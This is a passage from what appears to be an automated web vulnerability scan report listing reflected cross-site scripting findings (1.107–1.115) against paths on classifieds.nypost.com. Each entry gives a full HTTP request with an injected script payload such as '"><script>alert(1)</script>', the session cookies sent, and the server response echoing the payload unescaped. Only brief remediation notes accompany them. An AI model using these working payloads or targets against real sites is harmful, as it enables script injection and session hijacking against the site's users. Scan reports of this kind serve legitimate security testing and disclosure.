Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:33 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=464dde5ca4883fed6a855f51a5f4de87; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=f7ae3d9d88e4c60783389785b3807c51; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FMzFEREE3MzRDRjAxNkNE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/jobe558c"><script>alert(1)</script>30e5e0450f6/" />
...[SNIP]...

1.107. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2440c"-alert(1)-"c811013299b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post2440c"-alert(1)-"c811013299b/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds post2440c"-alert(1)-"c811013299b/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.108. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b63c"><script>alert(1)</script>b15499556ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post4b63c"><script>alert(1)</script>b15499556ff/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post4b63c"><script>alert(1)</script>b15499556ff/" />
...[SNIP]...

1.109. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e01"><script>alert(1)</script>97ca925315f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?13e01"><script>alert(1)</script>97ca925315f=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post/?13e01"><script>alert(1)</script>97ca925315f=1" />
...[SNIP]...

1.110. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16e1d"-alert(1)-"19c54cf058c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post/?16e1d"-alert(1)-"19c54cf058c=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
t-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-post-_-post-_--_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("post ?16e1d"-alert(1)-"19c54cf058c=1","10000023","","","ny-_-post-_-post-_-nypost USA-_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.111. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef82"><script>alert(1)</script>51c27fc46b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro6ef82"><script>alert(1)</script>51c27fc46b0/register/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro6ef82"><script>alert(1)</script>51c27fc46b0/register/" />
...[SNIP]...

1.112. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce24"-alert(1)-"558676f4583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profce24"-alert(1)-"558676f4583/register/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds profce24"-alert(1)-"558676f4583/register/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.113. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 110c4"-alert(1)-"06e49108037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/register110c4"-alert(1)-"06e49108037/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwNDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro/register110c4"-alert(1)-"06e49108037/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.114. http://www.classifieds.nypost.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe676"><script>alert(1)</script>d1c74ecb45a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/registerfe676"><script>alert(1)</script>d1c74ecb45a/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809720003; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjk5NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:33:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzYwMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/registerfe676"><script>alert(1)</script>d1c74ecb45a/" />
...[SNIP]...

1.115. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34569"-alert(1)-"97496bfe908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale34569"-alert(1)-"97496bfe908/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
